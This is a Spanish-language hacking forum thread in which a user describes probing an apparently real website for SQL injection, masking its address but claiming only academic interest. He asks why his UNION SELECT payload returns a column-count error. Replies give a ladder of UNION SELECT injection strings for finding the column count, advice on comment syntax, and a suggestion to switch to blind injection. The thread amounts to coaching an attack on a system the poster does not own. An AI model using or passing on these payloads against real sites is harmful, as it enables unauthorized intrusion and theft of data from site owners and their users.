respuesta contradicotria en sql injection

Iniciado por sapito169, 5 Septiembre 2010, 05:36 AM

0 Miembros y 1 Visitante están viendo este tema.

sapito169

hola foreros
estoy tratando de obtener información de una pagina vulnerable(no me gusta hacer maldades solo es un interés académico)
bien reconocí que la pagina es vulnerable por que al ponerle en el url

xxxxxxx.php?id=' me voto de resultado

CitarYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND active = 'T'' at line 1

con lo cual ya se que es mysql con php y ademas me pasa un pedaso del query y que es vulnerable

luego al tratar de averiguar cuantas columnas vota la consulta puse

xxxxxxx.php?id=4 order by 10/*

me voto error pero con 9 no con lo que averigüe que tiene 9 columnas

acá viene lo extraño cuando trato de sacar mas información usando union

xxxxxxx.php?id=4 union all select 1,2,3,4,5,6,7,8,9/*

me vota esta respuesta contradictoria
Citar
The used SELECT statements have a different number of columns



OzX

Lo que YO ejecutaría seria.

4+and+1=0+union+select+all+1+--+
4+and+1=0+union+select+all+1,2+--+
4+and+1=0+union+select+all+1,2,3+--+
4+and+1=0+union+select+all+1,2,3,4+--+
4+and+1=0+union+select+all+1,2,3,4,5+--+
4+and+1=0+union+select+all+1,2,3,4,5,6+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9+--+
4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9,10...N+--+


Muchas veces 1 variable via GET es tomada por 2 funciones distintas en la misma web.
Me explico.
Aveces la pagina hace 2 consultas en donde la segunda depende de la primera. es por ello que aveces te tira ese error, siendo que realmente no es la cantidad de campos original en la consulta si no mas bien es de la segunda consulta.

Cambia el /* por el +--+, por cada intento aveces por ese maldito detalle es que no deja generar bien la consulta.


En el Caso que no te muestre nada, explotalo bien blind.

SAludos.

WHK

eso sucede cuando tienes una cantidad de columnas diferentes a las columnas devueltas, por eso la cantidad de columnas te resulta 9 pero realmente la query completa debuelve otra cantidad